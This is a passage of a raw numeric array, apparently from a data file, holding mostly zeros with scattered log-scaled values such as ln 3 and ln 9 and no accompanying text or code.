0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.804021044733257, 0.0, 0, 0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.800574088041945, 0.0, \n 4.06534854782536, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.6635616461296467, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 7.217724106087479, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 3.6635616461296467, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.713572066704308, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 5.0301047650807, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 6.1683892320507745, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 2.833213344056216, \n 3.4011973816621555, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 2.1972245773362196, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 3.178053830347946, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 4.49053690687189, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 4.1588830833596715, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.101797476893978,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.6931471805599453, 0.0, 1.0986122886681098, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 3.2188758248682006,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 